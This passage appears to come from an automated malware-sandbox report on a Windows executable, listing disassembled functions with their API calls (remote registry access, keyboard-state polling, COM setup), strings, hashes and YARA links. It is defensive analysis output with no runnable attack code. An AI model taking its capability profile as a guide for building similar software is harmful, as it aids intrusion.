                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                            • String ID:
                                                            • API String ID: 136442275-0
                                                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                            Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcsncpy.LIBCMT ref: 00467490
                                                            • _wcsncpy.LIBCMT ref: 004674BC
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcstok.LIBCMT ref: 004674FF
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcstok.LIBCMT ref: 004675B2
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                            • String ID: X
                                                            • API String ID: 3104067586-3081909835
                                                            • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                            • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                            Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                            • _wcslen.LIBCMT ref: 0046CDB0
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 0046CEA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 440038798-2785691316
                                                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                            Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                            • _wcslen.LIBCMT ref: 004610A3
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                            • GetWindowRect.USER32(?,?), ref: 00461248
                                                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 4136854206-1241985126
                                                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                            Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                            • GetClientRect.USER32(?,?), ref: 00471A1A
                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                            • String ID: 2
                                                            • API String ID: 1331449709-450215437
                                                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                            Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                            • API String ID: 3054410614-2561132961
                                                            • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                            • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                            Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 600699880-22481851
                                                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                            Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: static
                                                            • API String ID: 3375834691-2160076837
                                                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                            Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                            • API String ID: 2907320926-3566645568
                                                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                            Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                            • DeleteObject.GDI32(00000000), ref: 00470A04
                                                            • DestroyIcon.USER32(00790053), ref: 00470A1C
                                                            • DeleteObject.GDI32(2EB2D464), ref: 00470A34
                                                            • DestroyWindow.USER32(004D0041), ref: 00470A4C
                                                            • DestroyIcon.USER32(?), ref: 00470A73
                                                            • DestroyIcon.USER32(?), ref: 00470A81
                                                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1237572874-0
                                                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                            Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                            • VariantInit.OLEAUT32(?), ref: 004793E1
                                                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                            • VariantClear.OLEAUT32(?), ref: 00479489
                                                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                            • VariantClear.OLEAUT32(?), ref: 004794CA
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                            • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                            Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044480E
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                            • GetKeyState.USER32(000000A0), ref: 004448AA
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                            • GetKeyState.USER32(000000A1), ref: 004448D9
                                                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                            • GetKeyState.USER32(00000011), ref: 00444903
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                            • GetKeyState.USER32(00000012), ref: 0044492D
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                            • GetKeyState.USER32(0000005B), ref: 00444958
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                            Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
